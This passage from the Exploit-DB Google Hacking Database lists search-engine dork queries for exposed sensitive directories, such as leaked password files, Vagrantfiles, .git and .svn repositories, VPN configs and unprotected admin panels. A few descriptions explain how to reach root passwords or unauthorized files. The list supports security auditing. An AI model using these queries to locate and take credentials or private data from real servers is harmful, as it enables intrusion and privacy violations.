<date>2020-01-23</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5128</id>
<link>https://www.exploit-db.com/ghdb/5128</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Last modified&quot; intitle:&quot;index of&quot; &quot;dropbox&quot;</shortDescription>
<textualDescription>Dropbox folders
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;Last modified&quot; intitle:&quot;index of&quot; &quot;dropbox&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Last modified&quot; intitle:&quot;index of&quot; &quot;dropbox&quot;</querystring>
<edb></edb>
<date>2019-02-18</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4645</id>
<link>https://www.exploit-db.com/ghdb/4645</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;lv_poweredBy&quot;</shortDescription>
<textualDescription>Folders with a lot of shared files!!!.
Enjoy!.
Dork by Rootkit_Pentester.
</textualDescription>
<query>&quot;lv_poweredBy&quot;</query>
<querystring>https://www.google.com/search?q=&quot;lv_poweredBy&quot;</querystring>
<edb></edb>
<date>2018-01-01</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>4572</id>
<link>https://www.exploit-db.com/ghdb/4572</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;m.zippyshare.com/&quot;</shortDescription>
<textualDescription>maybe directory trick listener i dont know but useful :)
type on google this this form.: &quot;m.zippyshare.com/&quot;
- zoltan</textualDescription>
<query>&quot;m.zippyshare.com/&quot;</query>
<querystring>https://www.google.com/search?q=&quot;m.zippyshare.com/&quot;</querystring>
<edb></edb>
<date>2017-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4103</id>
<link>https://www.exploit-db.com/ghdb/4103</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;My Documents&quot; &quot;parent&quot; intitle:index.of</shortDescription>
<textualDescription>http://www.google.com/search?q=&quot;My Documents&quot; &quot;parent&quot; intitle:index.of
&quot;My Documents&quot; folders shared on the interwebs...
Decoy</textualDescription>
<query>&quot;My Documents&quot; &quot;parent&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?q=&quot;My Documents&quot; &quot;parent&quot; intitle:index.of</querystring>
<edb></edb>
<date>2015-10-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4816</id>
<link>https://www.exploit-db.com/ghdb/4816</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Powered by Apache Subversion version&quot;</shortDescription>
<textualDescription> Looking for the SVN source code folder.
Sang Bui
</textualDescription>
<query>&quot;Powered by Apache Subversion version&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Apache Subversion version&quot;</querystring>
<edb></edb>
<date>2018-05-11</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>4381</id>
<link>https://www.exploit-db.com/ghdb/4381</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Powered by AutoIndex PHP Script&quot; ext:php</shortDescription>
<textualDescription>Google Dork: &quot;Powered by AutoIndex PHP Script&quot; ext:php
Sensitive Directories and Files Containing Juicy Info
Google Dork by Ini Lerm
</textualDescription>
<query>&quot;Powered by AutoIndex PHP Script&quot; ext:php</query>
<querystring>https://www.google.com/search?q=&quot;Powered by AutoIndex PHP Script&quot; ext:php</querystring>
<edb></edb>
<date>2017-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>778</id>
<link>https://www.exploit-db.com/ghdb/778</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Powered by Invision Power File Manager&quot; (inurl:login.php) | (intitle:&quot;Browsing directory /&quot; )</shortDescription>
<textualDescription>Invision Power File Manager is a popular file management script, written in the popular PHP Scripting Language. It is compatiable with all forms of Unix and Windows and allows the user to control their files via any modern browser.</textualDescription>
<query>&quot;Powered by Invision Power File Manager&quot; (inurl:login.php) | (intitle:&quot;Browsing directory /&quot; )</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Invision+Power+File+Manager%22+%28inurl%3Alogin.php%29+%7C+%28intitle%3A%22Browsing+directory+%2F%22+%29+</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5101</id>
<link>https://www.exploit-db.com/ghdb/5101</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;sasl_passwd&quot; | smtpd.conf intitle:&quot;index of&quot;</shortDescription>
<textualDescription>Postfix sensitive files, also passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;sasl_passwd&quot; | smtpd.conf intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;sasl_passwd&quot; | smtpd.conf intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6453</id>
<link>https://www.exploit-db.com/ghdb/6453</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Share Link&quot; inurl:/share.cgi?ssid=</shortDescription>
<textualDescription># Google Dork: &quot;Share Link&quot; inurl:/share.cgi?ssid=
# myQnap cloud servers files and folder shared.
# Date: 27/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Share Link&quot; inurl:/share.cgi?ssid=</query>
<querystring>https://www.google.com/search?q=&quot;Share Link&quot; inurl:/share.cgi?ssid=</querystring>
<edb></edb>
<date>2020-07-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4100</id>
<link>https://www.exploit-db.com/ghdb/4100</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;sql&quot; &quot;parent&quot; intitle:index.of -injection</shortDescription>
<textualDescription>Directories containing SQL Installs and/or SQL databases...
Decoy</textualDescription>
<query>&quot;sql&quot; &quot;parent&quot; intitle:index.of -injection</query>
<querystring>https://www.google.com/search?q=&quot;sql&quot; &quot;parent&quot; intitle:index.of -injection</querystring>
<edb></edb>
<date>2015-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5262</id>
<link>https://www.exploit-db.com/ghdb/5262</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;To Parent Directory&quot; AND &quot;dir&gt;&quot; AND &quot;web.config&quot;</shortDescription>
<textualDescription>Dork:
&quot;To Parent Directory&quot; AND &quot;dir&gt;&quot; AND &quot;web.config&quot;
Description:
Web Servers with Open Directory Listing containing web.config file
</textualDescription>
<query>&quot;To Parent Directory&quot; AND &quot;dir&gt;&quot; AND &quot;web.config&quot;</query>
<querystring>https://www.google.com/search?q=&quot;To Parent Directory&quot; AND &quot;dir&gt;&quot; AND &quot;web.config&quot;</querystring>
<edb></edb>
<date>2019-06-19</date>
<author>Isaiah Puzon</author>
</entry>
<entry>
<id>1214</id>
<link>https://www.exploit-db.com/ghdb/1214</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Warning: Installation directory exists at&quot; &quot;Powered by Zen Cart&quot; -demo</shortDescription>
<textualDescription>by this dork you can find fresh installations of Zen-Cartsee Full Disclosure forums fore details... ;)</textualDescription>
<query>&quot;Warning: Installation directory exists at&quot; &quot;Powered by Zen Cart&quot; -demo</query>
<querystring>https://www.google.com/search?q=%22Warning%3A+Installation+directory+exists+at%22+%22Powered+by+Zen+Cart%22+-demo</querystring>
<edb></edb>
<date>2005-12-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>810</id>
<link>https://www.exploit-db.com/ghdb/810</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Web File Browser&quot; &quot;Use regular expression&quot;</shortDescription>
<textualDescription>This will ask google to search for a php script used to manage files on a server. The script &quot;Web File Browser&quot; enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server.</textualDescription>
<query>&quot;Web File Browser&quot; &quot;Use regular expression&quot;</query>
<querystring>https://www.google.com/search?q=%22Web+File+Browser%22+%22Use+regular+expression%22&amp;hl=en</querystring>
<edb></edb>
<date>2005-01-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>133</id>
<link>https://www.exploit-db.com/ghdb/133</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Welcome to phpMyAdmin&quot; &quot; Create new database&quot;</shortDescription>
<textualDescription>phpMyAdmin is a widly spread webfrontend used to mantain sql databases. The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well gues what, obviously some admins are either too lazy or don't know how to secure their directories. These pages should obviously not be accessable to the public without some kind of password ;-)</textualDescription>
<query>&quot;Welcome to phpMyAdmin&quot; &quot; Create new database&quot;</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+phpMyAdmin%22+AND+%22+Create+new+database%22&amp;btnG=Google+Suche</querystring>
<edb></edb>
<date>2003-08-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1209</id>
<link>https://www.exploit-db.com/ghdb/1209</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;Welcome to the directory listing of&quot; &quot;NetworkActiv-Web-Server&quot;</shortDescription>
<textualDescription>this is for NetworkActiv-Web-Server directory listing</textualDescription>
<query>&quot;Welcome to the directory listing of&quot; &quot;NetworkActiv-Web-Server&quot;</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+the+directory+listing+of%22+%22NetworkActiv-Web-Server%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6517</id>
<link>https://www.exploit-db.com/ghdb/6517</link>
<category>Sensitive Directories</category>
<shortDescription>&quot;ws_ftp.log&quot; ext:log</shortDescription>
<textualDescription># Google Dork: &quot;ws_ftp.log&quot; ext:log
# Sensitive directories.
# Date: 1/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;ws_ftp.log&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;ws_ftp.log&quot; ext:log</querystring>
<edb></edb>
<date>2020-09-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4239</id>
<link>https://www.exploit-db.com/ghdb/4239</link>
<category>Sensitive Directories</category>
<shortDescription>(intext:&quot;index of /.git&quot;) (&quot;parent directory&quot;)</shortDescription>
<textualDescription>This dork will find git repository's which may have sensitive information.
(intext:&quot;index of /.git&quot;) (&quot;parent directory&quot;)
Enjoy!
necrodamus</textualDescription>
<query>(intext:&quot;index of /.git&quot;) (&quot;parent directory&quot;)</query>
<querystring>https://www.google.com/search?q=(intext:&quot;index of /.git&quot;) (&quot;parent directory&quot;)</querystring>
<edb></edb>
<date>2016-03-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4531</id>
<link>https://www.exploit-db.com/ghdb/4531</link>
<category>Sensitive Directories</category>
<shortDescription>-inurl:htm -inurl:html intitle:&quot;index of&quot; 100CANON</shortDescription>
<textualDescription>Explore the Images and photos uploaded and saved in Directories from Canon
DSLRs and Camera @Reveal2Maviya #Reveal2Maviya
&quot;-inurl:htm -inurl:html intitle:&quot;index of&quot; 100CANON&quot;
</textualDescription>
<query>-inurl:htm -inurl:html intitle:&quot;index of&quot; 100CANON</query>
<querystring>https://www.google.com/search?q=-inurl:htm -inurl:html intitle:&quot;index of&quot; 100CANON</querystring>
<edb></edb>
<date>2017-06-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4532</id>
<link>https://www.exploit-db.com/ghdb/4532</link>
<category>Sensitive Directories</category>
<shortDescription>-inurl:htm -inurl:html intitle:&quot;index of&quot; NIKON</shortDescription>
<textualDescription>Explore the Images and photos uploaded and saved in Directories from Nikon
DSLRs and Camera @Reveal2Maviya #Reveal2Maviya
-inurl:htm -inurl:html intitle:&quot;index of&quot; NIKON</textualDescription>
<query>-inurl:htm -inurl:html intitle:&quot;index of&quot; NIKON</query>
<querystring>https://www.google.com/search?q=-inurl:htm -inurl:html intitle:&quot;index of&quot; NIKON</querystring>
<edb></edb>
<date>2017-06-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5718</id>
<link>https://www.exploit-db.com/ghdb/5718</link>
<category>Sensitive Directories</category>
<shortDescription>-pool intitle:&quot;index of&quot; wget-log -pub</shortDescription>
<textualDescription>This dork will give you a good insight of what was downloaded in a system.
Great for enumeration.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>-pool intitle:&quot;index of&quot; wget-log -pub</query>
<querystring>https://www.google.com/search?q=-pool intitle:&quot;index of&quot; wget-log -pub</querystring>
<edb></edb>
<date>2020-01-28</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5710</id>
<link>https://www.exploit-db.com/ghdb/5710</link>
<category>Sensitive Directories</category>
<shortDescription>-pub -pool intitle:&quot;index of&quot; squirrelmail/</shortDescription>
<textualDescription>Squirrel mail configuration files and sometimes credentials.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>-pub -pool intitle:&quot;index of&quot; squirrelmail/</query>
<querystring>https://www.google.com/search?q=-pub -pool intitle:&quot;index of&quot; squirrelmail/</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5711</id>
<link>https://www.exploit-db.com/ghdb/5711</link>
<category>Sensitive Directories</category>
<shortDescription>-pub -pool intitle:&quot;index of&quot; vagrantfile -&quot;How to&quot;</shortDescription>
<textualDescription>The primary function of the Vagrantfile is to describe the type of machine
required for a project, and how to configure and provision these machines.
It can contain DB passwords, private keys, usernames etc...
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>-pub -pool intitle:&quot;index of&quot; vagrantfile -&quot;How to&quot;</query>
<querystring>https://www.google.com/search?q=-pub -pool intitle:&quot;index of&quot; vagrantfile -&quot;How to&quot;</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6707</id>
<link>https://www.exploit-db.com/ghdb/6707</link>
<category>Sensitive Directories</category>
<shortDescription>/etc/certs + &quot;index of /&quot; */*</shortDescription>
<textualDescription>#Google dork: /etc/certs + &quot;index of /&quot; */*
#Catregory: Sensitive directories
#Expoit Author: Abishekraghav Murugeashan
#linkedIn: https://www.linkedin.com/in/arhaxor21/
</textualDescription>
<query>/etc/certs + &quot;index of /&quot; */*</query>
<querystring>https://www.google.com/search?q=/etc/certs + &quot;index of /&quot; */*</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Abishekraghav Murugeashan</author>
</entry>
<entry>
<id>6715</id>
<link>https://www.exploit-db.com/ghdb/6715</link>
<category>Sensitive Directories</category>
<shortDescription>/etc/config + &quot;index of /&quot; /</shortDescription>
<textualDescription># Google Dork: &quot;/etc/config + &quot;index of /&quot; */*&quot;
# Title: Sensitive file disclosure
# Date: 04/12/2020
# Author: Manish Solanki
# LinkedIn: https://www.linkedin.com/company/thehacktivists/
# Bugcrowd: https://bugcrowd.com/ethicalhaxter
</textualDescription>
<query>/etc/config + &quot;index of /&quot; /</query>
<querystring>https://www.google.com/search?q=/etc/config + &quot;index of /&quot; /</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Manish Solanki</author>
</entry>
<entry>
<id>4773</id>
<link>https://www.exploit-db.com/ghdb/4773</link>
<category>Sensitive Directories</category>
<shortDescription>:DIR | intitle:index of inurl://whatsapp/</shortDescription>
<textualDescription>Unconfirmed Websites leaking Whatsapp Databases.
Author: Parth S. Patel
https://ca.linkedin.com/in/parthpateloscp
</textualDescription>
<query>:DIR | intitle:index of inurl://whatsapp/</query>
<querystring>https://www.google.com/search?q=:DIR | intitle:index of inurl://whatsapp/</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>1432</id>
<link>https://www.exploit-db.com/ghdb/1432</link>
<category>Sensitive Directories</category>
<shortDescription>allintext:&quot;WebServerX Server at&quot;</shortDescription>
<textualDescription>Quick and dirty WebserverX HTTP server google dork</textualDescription>
<query>allintext:&quot;WebServerX Server at&quot;</query>
<querystring>https://www.google.com/search?q=allintext%3A%22WebServerX+Server+at%22&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4840</id>
<link>https://www.exploit-db.com/ghdb/4840</link>
<category>Sensitive Directories</category>
<shortDescription>allintext:'HttpFileServer 2.3k'</shortDescription>
<textualDescription>Dork about sensitive directory of HFS File Share Server
allintext:'HttpFileServer 2.3k'
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>allintext:'HttpFileServer 2.3k'</query>
<querystring>https://www.google.com/search?q=allintext:'HttpFileServer 2.3k'</querystring>
<edb></edb>
<date>2018-06-04</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>6196</id>
<link>https://www.exploit-db.com/ghdb/6196</link>
<category>Sensitive Directories</category>
<shortDescription>allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx</shortDescription>
<textualDescription># Google Dork: allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx
# Sensitive stuff.
# Date: 29/05/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx</query>
<querystring>https://www.google.com/search?q=allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5170</id>
<link>https://www.exploit-db.com/ghdb/5170</link>
<category>Sensitive Directories</category>
<shortDescription>allintitle: \&quot;index of/admin\&quot;</shortDescription>
<textualDescription># Google Dork: allintitle: \&quot;index of/admin\&quot;
# By using this dork it is possible to access some admin login pages
and parent directory structures ,we can access some vulnerable information
like framework used for the web site technology used for building the
web site and etc.
# Date: 04/04/2019
# Author: Ashwin Rajeev
</textualDescription>
<query>allintitle: &quot;index of/admin&quot;</query>
<querystring>https://www.google.com/search?q=allintitle: \&quot;index of/admin\&quot;</querystring>
<edb></edb>
<date>2019-04-04</date>
<author>Ashwin Rajeev</author>
</entry>
<entry>
<id>1309</id>
<link>https://www.exploit-db.com/ghdb/1309</link>
<category>Sensitive Directories</category>
<shortDescription>allintitle:&quot;FirstClass Login&quot;</shortDescription>
<textualDescription>allintitle:&quot;FirstClass Login&quot; this is for firstclass directory listingsgo to http://[target]/[path]/Search type just ' in search field and you have a list of downloadable files, you don't see all files on server but you can search for a robots.txt with some folders path or other info for site scructure, crawling in this way you have unauthorized access on all files on the target server</textualDescription>
<query>allintitle:&quot;FirstClass Login&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=allintitle%3A%22FirstClass+Login%22+&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>5099</id>
<link>https://www.exploit-db.com/ghdb/5099</link>
<category>Sensitive Directories</category>
<shortDescription>allintitle:&quot;Index of /Admin/Common&quot; | allintext:&quot;Parent Directory&quot;</shortDescription>
<textualDescription>Category : Sensitive Directories
Description : Dork for finding access of listed Admin directories which
normally restricted to normal users. Usually to access those files need an
admin login.
Note : To access more sensitive files locate to parent directory until
/admin or /conf etc.
Dork : allintitle:&quot;Index of /Admin/Common&quot; | allintext:&quot;Parent Directory&quot;
Date : 10/2/2019
Author : Manish Bhandarkar
Blog : https://hackingforsecurity.blogspot.com/
</textualDescription>
<query>allintitle:&quot;Index of /Admin/Common&quot; | allintext:&quot;Parent Directory&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Index of /Admin/Common&quot; | allintext:&quot;Parent Directory&quot;</querystring>
<edb></edb>
<date>2019-02-13</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>5098</id>
<link>https://www.exploit-db.com/ghdb/5098</link>
<category>Sensitive Directories</category>
<shortDescription>allintitle:&quot;Index of /ThinkPHP&quot; | inurl: &quot;/ThinkPHP/&quot;</shortDescription>
<textualDescription>Category : Sensitive Directories
Description : Dork for finding list of private directories such as library,
licence, config files and more in ThinkPHP framework used for websites
Dork : allintitle:&quot;Index of /ThinkPHP&quot; | inurl: &quot;/ThinkPHP/&quot;
Date : 10/2/2019
Author : Manish Bhandarkar (https://hackingforsecurity.blogspot.com/)
</textualDescription>
<query>allintitle:&quot;Index of /ThinkPHP&quot; | inurl: &quot;/ThinkPHP/&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Index of /ThinkPHP&quot; | inurl: &quot;/ThinkPHP/&quot;</querystring>
<edb></edb>
<date>2019-02-12</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>790</id>
<link>https://www.exploit-db.com/ghdb/790</link>
<category>Sensitive Directories</category>
<shortDescription>allinurl:&quot;/*/_vti_pvt/&quot; | allinurl:&quot;/*/_vti_cnf/&quot;</shortDescription>
<textualDescription>Frontpage extensions for Unix ? So be it..</textualDescription>
<query>allinurl:&quot;/*/_vti_pvt/&quot; | allinurl:&quot;/*/_vti_cnf/&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=allinurl%3A%22%2F*%2F_vti_pvt%2F%22+%7C+allinurl%3A%22%2F*%2F_vti_cnf%2F%22</querystring>
<edb></edb>
<date>2004-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5100</id>
<link>https://www.exploit-db.com/ghdb/5100</link>
<category>Sensitive Directories</category>
<shortDescription>allinurl:&quot;wp-content/plugins/wordpress-popup/views/admin/&quot;</shortDescription>
<textualDescription>Category : Sensitive Directories
Description : Dork for finding private directories inside wordpress-popup
plugin including admin data which are present in Wordpress websites.
Note : To access more sensitive files locate to parent directory until
/admin or /conf etc.
Dork : allinurl:&quot;wp-content/plugins/wordpress-popup/views/admin/&quot;
Also Try : allinurl:&quot;wp-content/plugins/wordpress-popup/&quot;
Date : 10/2/2019
Author : Manish Bhandarkar
Blog : https://hackingforsecurity.blogspot.com/
</textualDescription>
<query>allinurl:&quot;wp-content/plugins/wordpress-popup/views/admin/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:&quot;wp-content/plugins/wordpress-popup/views/admin/&quot;</querystring>
<edb></edb>
<date>2019-02-13</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>3931</id>
<link>https://www.exploit-db.com/ghdb/3931</link>
<category>Sensitive Directories</category>
<shortDescription>allinurl:/hide_my_wp=</shortDescription>
<textualDescription>i just found a google dork that is
file/path disclosure of
Hide My WP plugin
Google dork - allinurl:/hide_my_wp=
it will show the plugin file folder and all file.
thanks
kamrul hassan arman</textualDescription>
<query>allinurl:/hide_my_wp=</query>
<querystring>https://www.google.com/search?q=allinurl:/hide_my_wp=</querystring>
<edb></edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6550</id>
<link>https://www.exploit-db.com/ghdb/6550</link>
<category>Sensitive Directories</category>
<shortDescription>ext:reg [HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys]</shortDescription>
<textualDescription># Google Dork: ext:reg [HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys]
# This search locates private SSHHostkeys.
# Date: 18/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>ext:reg [HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSshHostKeys]</query>
<querystring>https://www.google.com/search?q=ext:reg [HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys]</querystring>
<edb></edb>
<date>2020-09-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>288</id>
<link>https://www.exploit-db.com/ghdb/288</link>
<category>Sensitive Directories</category>
<shortDescription>filetype:cfg ks intext:rootpw -sample -test -howto</shortDescription>
<textualDescription>Anaconda is a linux configuration tool like yast on suse linux. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.There are more ks configs then you might expect and with a bit of searching through the result list an attacker can find the root password and own that system.</textualDescription>
<query>filetype:cfg ks intext:rootpw -sample -test -howto</query>
<querystring>https://www.google.com/search?hl=de&amp;q=filetype%3Acfg+ks+intext%3Arootpw+-sample+-test+-howto</querystring>
<edb></edb>
<date>2004-06-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5228</id>
<link>https://www.exploit-db.com/ghdb/5228</link>
<category>Sensitive Directories</category>
<shortDescription>filetype:git -github.com inurl:&quot;/.git&quot;</shortDescription>
<textualDescription>Google dork description: web servers serving the git repository. This
potential flaw can be used to download content from the Web server that
might otherwise be private.
Google Search: filetype:git -github.com inurl:&quot;/.git&quot;
Submitted by: Alfie
Website: (https://the-infosec.com)
</textualDescription>
<query>filetype:git -github.com inurl:&quot;/.git&quot;</query>
<querystring>https://www.google.com/search?q=filetype:git -github.com inurl:&quot;/.git&quot;</querystring>
<edb></edb>
<date>2019-05-29</date>
<author>Alfie</author>
</entry>
<entry>
<id>894</id>
<link>https://www.exploit-db.com/ghdb/894</link>
<category>Sensitive Directories</category>
<shortDescription>filetype:ini Desktop.ini intext:mydocs.dll</shortDescription>
<textualDescription>This dork finds any webshared windows folder inside my docs. You can change the end bit &quot;intext:mydocs.dll&quot; by looking inside any of your your own folders on your pc, looking for the desktop.ini file and add some of the information to the query. For Anouther example - Shell Folders (Favourite etc) filetype:ini Desktop.iniintext:shell32.dllEnjoy</textualDescription>
<query>filetype:ini Desktop.iniintext:mydocs.dll</query>
<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;as_qdr=all&amp;q=filetype%3Aini+Desktop.ini+intext%3Amydocs.dll</querystring>
<edb></edb>
<date>2005-02-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>5230</id>
<link>https://www.exploit-db.com/ghdb/5230</link>
<category>Sensitive Directories</category>
<shortDescription>filetype:svn -gitlab -github inurl:&quot;/.svn&quot;</shortDescription>
<textualDescription>Google dork description: web servers serving the svn repository. This
potential flaw can be used to download content from the Web server that
might otherwise be private.
Google Search: filetype:svn -gitlab -github inurl:&quot;/.svn&quot;
Submitted by: Alfie
Twitter: https://twitter.com/emenalf</textualDescription>
<query>filetype:svn -gitlab -github inurl:&quot;/.svn&quot;</query>
<querystring>https://www.google.com/search?q=filetype:svn -gitlab -github inurl:&quot;/.svn&quot;</querystring>
<edb></edb>
<date>2019-05-29</date>
<author>Alfie</author>
</entry>
<entry>
<id>821</id>
<link>https://www.exploit-db.com/ghdb/821</link>
<category>Sensitive Directories</category>
<shortDescription>filetype:torrent torrent</shortDescription>
<textualDescription>Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to shows you can use Google for all kinds of filetypes, not just pdf or html..</textualDescription>
<query>filetype:torrent torrent</query>
<querystring>https://www.google.com/search?q=filetype%3Atorrent+torrent</querystring>
<edb></edb>
<date>2005-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>6561</id>
<link>https://www.exploit-db.com/ghdb/6561</link>
<category>Sensitive Directories</category>
<shortDescription>GitLab ssh.log ext:log</shortDescription>
<textualDescription># Google Dork: GitLab ssh.log ext:log
# Author: Muralikrishna Janga
# Category: Sensitive Directories
# About the Dork: Dork would help to find GitLab logs and sensitive
directories
</textualDescription>
<query>GitLab ssh.log ext:log</query>
<querystring>https://www.google.com/search?q=GitLab ssh.log ext:log</querystring>
<edb></edb>
<date>2020-09-23</date>
<author>Muralikrishna Janga</author>
</entry>
<entry>
<id>7292</id>
<link>https://www.exploit-db.com/ghdb/7292</link>
<category>Sensitive Directories</category>
<shortDescription>Google Dork: intitle: &quot;index of&quot; &quot;payment&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of&quot; &quot;payment&quot;
# Sensitive Directories
# Date:21/09/2021
# Exploit Author: Bon Sai
</textualDescription>
<query>Google Dork: intitle: &quot;index of&quot; &quot;payment&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: intitle: &quot;index of&quot; &quot;payment&quot;</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Bon Sai</author>
</entry>
<entry>
<id>4364</id>
<link>https://www.exploit-db.com/ghdb/4364</link>
<category>Sensitive Directories</category>
<shortDescription>Hostinger © 2016. All rights reserved inurl:default.php</shortDescription>
<textualDescription>Google Dork: Hostinger © 2016. All rights reserved inurl:default.php
Hostinger web hosting clients with default Public page, list of Sensitive Directories and list of files in public_html folder
Google Dork by INILERM
---
El software de antivirus Avast ha analizado este correo electrónico en busca de virus.
https://www.avast.com/antivirus</textualDescription>
<query>Hostinger © 2016. All rights reserved inurl:default.php</query>
<querystring>https://www.google.com/search?q=Hostinger © 2016. All rights reserved inurl:default.php</querystring>
<edb></edb>
<date>2016-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5269</id>
<link>https://www.exploit-db.com/ghdb/5269</link>
<category>Sensitive Directories</category>
<shortDescription>Index of / *.ovpn</shortDescription>
<textualDescription>Files configuration openvpn, some certs, keys.
Index of / *.ovpn
Author: nuria_pp</textualDescription>
<query>Index of / *.ovpn</query>
<querystring>https://www.google.com/search?q=Index of / *.ovpn</querystring>
<edb></edb>
<date>2019-06-24</date>
<author>nuria_pp</author>
</entry>
<entry>
<id>5012</id>
<link>https://www.exploit-db.com/ghdb/5012</link>
<category>Sensitive Directories</category>
<shortDescription>Index of /.svn</shortDescription>
<textualDescription>SVN directory
ManhNho
</textualDescription>
<query>Index of /.svn</query>
<querystring>https://www.google.com/search?q=Index of /.svn</querystring>
<edb></edb>
<date>2018-11-06</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5448</id>
<link>https://www.exploit-db.com/ghdb/5448</link>
<category>Sensitive Directories</category>
<shortDescription>index of /cache</shortDescription>
<textualDescription>Google Dork : index of /cache
Nisankh Acharjya
</textualDescription>
<query>index of /cache</query>
<querystring>https://www.google.com/search?q=index of /cache</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Nisankh Acharjya</author>
</entry>
<entry>
<id>5030</id>
<link>https://www.exploit-db.com/ghdb/5030</link>
<category>Sensitive Directories</category>
<shortDescription>index of /ckeditor</shortDescription>
<textualDescription>ckeditor directories
